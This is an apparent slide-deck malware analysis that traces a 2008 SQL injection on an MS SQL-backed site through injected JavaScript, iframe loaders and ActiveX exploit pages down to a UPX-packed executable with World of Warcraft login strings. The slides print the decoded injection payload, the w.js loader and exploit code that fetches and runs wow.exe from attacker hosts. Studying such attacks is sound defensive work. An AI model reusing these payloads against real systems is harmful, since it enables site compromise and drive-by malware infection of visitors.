  • 7. Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
  • 8. Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
  • 9. Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 44 45 43 4C 41 D E C L A Those numbers seem to be ASCII codes in hex (base 16) 4445434C41 Let’s write a quick conversion utility ( in Python – my favourite  ) @JirkaV
  • 10. Peeling the first layer  Convert to readable text: 4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204 445434C415245205461626C655F437572736F7220435552534F5220464F52... DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor from binascii import unhexlify data = '4445434C415245204054207661726368... text = [] for idx in range(len(data)/2): text.append(unhexlify(data[2*idx:2*idx+2])) print ''.join(text) @JirkaV
  • 11. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor @JirkaV
  • 12. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database @JirkaV
  • 13. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... @JirkaV
  • 14. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) @JirkaV
  • 15. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database @JirkaV
  • 16. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database • injecting this HTML code, referencing a JavaScript @JirkaV
  • 17. Summary #1  The SQL injection tries to modify data in the database serving HTML pages, hoping to inject a reference to malicious JavaScript code into every page in the database  Technically, it tries to modify any text in the database  Any web browser visiting the site after the attack would fetch and execute the JavaScript code So, what would the JavaScript do? @JirkaV
  • 18. Analyzing the JavaScript  Download the JavaScript  Downloading JavaScript alone from its URL is relatively safe. There is no command to execute it, so the browser does not interpret it and displays it as a regular text  This makes it easy to analyze  Let’s download http://abc.verynx.cn/w.js @JirkaV
  • 19. Analyzing the JavaScript  w.js analysis window.onerror=function(){return true;} if(typeof(js86h)=="undefined") { var js86h=1; function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;} function cc_k() {var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime- y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}} var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution ='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAg ent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count21.51yes.com/sa.aspx?id=215052584'+yesdata+' height=0 width=0></iframe>'); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); document.write ('<script>var a4452tf="51la";var a4452pu="";var a4452pf="51la";var a4452su=window.location;var a4452sf=document.referrer;var a4452of="";var a4452op="";var a4452ops=1;var a4452ot=1;var a4452d=new Date();var a4452color="";if (navigator.appName=="Netscape"){a4452color=screen.pixelDepth;} else {a4452color=screen.colorDepth;}</script><script>a4452tf=top.document.referrer;</script><script>a4452pu =window.parent.location;</script><script>a4452pf=window.parent.document.referrer;</script><script>a4452ops=document.cooki e.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a4452ops=(a4452ops==null)?1: (parseInt(unescape((a4452ops)[2]))+1);var a4452oe =new Date();a4452oe.setTime(a4452oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a4452ops+ ";path=/;expires="+a4452oe.toGMTString();a4452ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a4452ot==null){a4452ot=1;}else{a4452ot=parseInt(unescape((a4452ot)[2])); a4452ot=(a4452ops==1)?(a4452ot+1):(a4452ot);}a4452oe.setTime(a4452oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_o k_times="+a4452ot+";path=/;expires="+a4452oe.toGMTString();</script><script>a4452of=a4452sf;if(a4452pf!=="51la"){a4452of=a 4452pf;}if(a4452tf!=="51la"){a4452of=a4452tf;}a4452op=a4452pu;try{lainframe}catch(e){a4452op=a4452su;}document.write('<img style="display:hidden;width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for- Webmasters&svid=20&id=2024452&tpages='+a4452ops+'&ttimes='+a4452ot+'&tzone='+(0- a4452d.getTimezoneOffset()/60)+'&tcolor='+a4452color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a 4452of)+'&vpage='+escape(a4452op)+'" />');</script>'); } @JirkaV
  • 20. Analyzing the JavaScript  w.js analysis – stripped down to its backbone window.onerror=function(){return true;} document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); @JirkaV
  • 21. Analyzing the JavaScript  Downloading the dangerous code  Since downloading the pages using a browser would do exactly what the attacker wanted, we’ll use safer approach  wget will download the HTML, but will not interpret it $ wget http://mm.ll80.com/123.htm --2008-07-23 19:55:09-- http://mm.ll80.com/123.htm Resolving mm.ll80.com... 60.173.11.119 Connecting to mm.ll80.com|60.173.11.119|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 431 [text/html] Saving to: `123.htm' @JirkaV
  • 22. Analyzing the JavaScript  Side note  At this point, I’ve switched to Linux simple because the necessary tools are easily available there and the risk of doing something stupid (such as clicking on some HTML file) is a bit smaller.  Also, any possibly malicious code is slightly less likely to work – one of the reasons is that the attacker(s) seem to target Microsoft world (MS SQL, remember?) @JirkaV
  • 23. Analyzing the injected HTML  Analyzing the HTML  Opening the HTML in a browser would be as bad as downloading it ... ... so we’ll use anything that does NOT understand HTML $ more 123.htm <iframe width=100 height=0 src=Ms06-014.htm> </iframe><iframe width=100 height=0 src=flash.htm> </iframe><iframe width=100 height=0 src=SP2.htm> </iframe><iframe width=100 height=0 src=Realplayer11.htm> </iframe><iframe width=100 height=0 src=Norton.htm> </iframe><iframe width=100 height=0 src=pxhack.htm> </iframe><script language="javascript“ type="text/javascript"src="http://js.users.51.la/2018815.js"></script> @JirkaV
  • 24. Analyzing the injected HTML  Getting some more HTML  Time to download the other referenced HTML files  Again, using “wget”  It turns out, that each HTML file targets one vulnerability, trying to exploit it and download an executable  Let’s take a look... @JirkaV
  • 25. Analyzing the injected HTML  Analyzing one exploit $ more Ms06-014.htm Svfox='http://mm.ll80.com/wow.exe'; qq853327659='C:MicroSoft.pif'; var Svfox_net=window["document"]["createElement"]("object"); Svfox_net["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var Svfox2=Svfox_net["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var Svfox3=Svfox_net["CreateObject"]("Adodb.Stream",""); Svfox3["type"]=1; www_svfox_net=gn(10000); var hHf$R6=Svfox_net["CreateObject"]("Scripting.FileSystemObject",""); var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0); www_svfox_net=hHf$R6["BuildPath"](VgDnZXHt7,www_svfox_net); var SmAcqIwGV8=Svfox_net["CreateObject"]("Shell.Application",""); exp1=hHf$R6["BuildPath"](VgDnZXHt7+'system32','cmd.exe'); SmAcqIwGV8["SHellExECuTe"](exp1,' /c echo C:MicroSoft.pif >C:MicroSoft.bat&echo del %0 >>C:MicroSoft.bat',"","open",0); @JirkaV
  • 26. Analyzing the injected HTML  Another exploit $ more pxhack.htm <a href="http://www.pxhac<script defer> var objFSO = new ActiveXObject('Scripting.FileSystemObject'); var objStream = objFSO.OpenTextFile(strFile,ForWriting,true,false); objStream.WriteLine('var objArgs = 'http://mm.ll80.com/wow.exe';'); objStream.WriteLine('var objargss ='c:gtest.exe';'); objStream.WriteLine('var sGet=new ActiveXObject('ADODB.Stream');'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new XMLHttpRequest();'); objStream.WriteLine('}'); objStream.WriteLine('catch (trymicrosoft) {'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new ActiveXObject('Msxml2.XMLHTTP');'); @JirkaV
  • 27. Analyzing the injected HTML  Exploits summary  All the HTML pages served only one purpose: To download wow.exe and execute it on victim’s computer  To achieve that, the attack tried to exploit multiple vulnerabilities in parallel to increase success probability.  The attack tried to exploit a web browser, flash, RealPlayer, ...  Why? Let’s see...  But first, another summary  @JirkaV
  • 28. Summary #2  The SQL injection tried to modify HTML pages in the database ... It is time to look at wow.exe  ... so anyone visiting this site would run JavaScript from another site...  ... that loaded several pages with various exploits ...  ... all trying to download and execute wow.exe on our visitor’s PC ... the name rings a bell, but let’s not jump into conclusions... @JirkaV
  • 29. Analyzing the binary  Checking wow.exe  Again, downloaded using wget $ xxd wow.exe | more 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0000010: b800 0000 0000 0000 4000 1a00 0000 0000 ........@....... 0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000030: 0000 0000 0000 0000 0000 0000 0001 0000 ................ 0000040: ba10 000e 1fb4 09cd 21b8 014c cd21 9090 ........!..L.!.. 0000050: 5468 6973 2070 726f 6772 616d 206d 7573 This program mus 0000060: 7420 6265 2072 756e 2075 6e64 6572 2057 t be run under W 0000070: 696e 3332 0d0a 2437 0000 0000 0000 0000 in32..$7........ 00001f0: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0000200: 00e0 0000 0010 0000 0000 0000 0004 0000 ................ 0000210: 0000 0000 0000 0000 0000 0000 8000 00e0 ................ 0000220: 5550 5831 0000 0000 0080 0000 00f0 0000 UPX1............ 0000230: 0076 0000 0004 0000 0000 0000 0000 0000 .v.............. 0000240: 0000 0000 4000 00e0 2e72 7372 6300 0000 ....@....rsrc... 0000250: 0010 0000 0070 0100 0002 0000 007a 0000 .....p.......z.. @JirkaV
  • 30. Analyzing the binary  Unpacking $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 43110 <- 33382 77.43% win32/pe wow.exe  But the unpacked file is still not very readable. What now?  Time for a long shot – what if it’s double-packed? $ xxd wow.exe | grep UPX 0005100: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0005130: 5550 5831 0000 0000 0050 0000 0020 0100 UPX1.....P... .. 00052f0: 5550 5821 0d09 0209 fd3d 1daa 6ca2 d7ff UPX!.....=..l... @JirkaV
  • 31. Analyzing the binary  Unpacking wow.exe – the second time $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: wow.exe: NotPackedException: not packed by UPX  Obviously, there is a bit of magic going on  But we don’t really care – we know a secret  @JirkaV
  • 32. Analyzing the binary  Unpacking wow.exe – the second time (again) $ xxd wow.exe | grep MZ 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0004f10: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0006c30: 4402 c34d 5a89 50fc 1920 065b aef8 4ed7 D..MZ.P.. .[..N. Hmm, it seems that we have two headers there. Time to ask Python for help again... >>> data = open('wow.exe', 'rb').read() >>> data = data[0x4f10:] >>> open('wow_int.exe', 'wb').write(data) @JirkaV
  • 33. Analyzing the binary  Unpacking wow.exe – the second time (again) $ ls -lh wow* -rw-r--r-- 1 jirka users 43K 2008-07-23 07:29 wow.exe -rw-r--r-- 1 jirka users 23K 2008-08-02 01:02 wow_int.exe $ upx -d wow_int.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 44886 <- 22870 50.95% win32/pe wow_int.exe @JirkaV
  • 34. Analyzing the binary  Unpacking wow.exe – the second time (again) $ strings wow_int.exe | more TObject u:hD SVWUQ SOFTWAREBlizzard EntertainmentWorld of Warcraft cn4.grunt.wowchina.com cn6.grunt.wowchina.com kr.logon.worldofwarcraft.com eu.logon.worldofwarcraft.com tw.logon.worldofwarcraft.com /flash.asp QQQQQ3 ZYYd offline action= update @JirkaV
  • 35. Conclusion  What next?  The next step would be figuring out what exactly the code does with World of Warcraft... ...but games are not my cup of tea so I’ll stop here. @JirkaV
  • 36. Overall Summary  So, the attack was using vulnerable web server to attack its clients.  Each client would be attacked using range of exploits in order to download and execute double-packed file  This file would contact World of Warcraft servers @JirkaV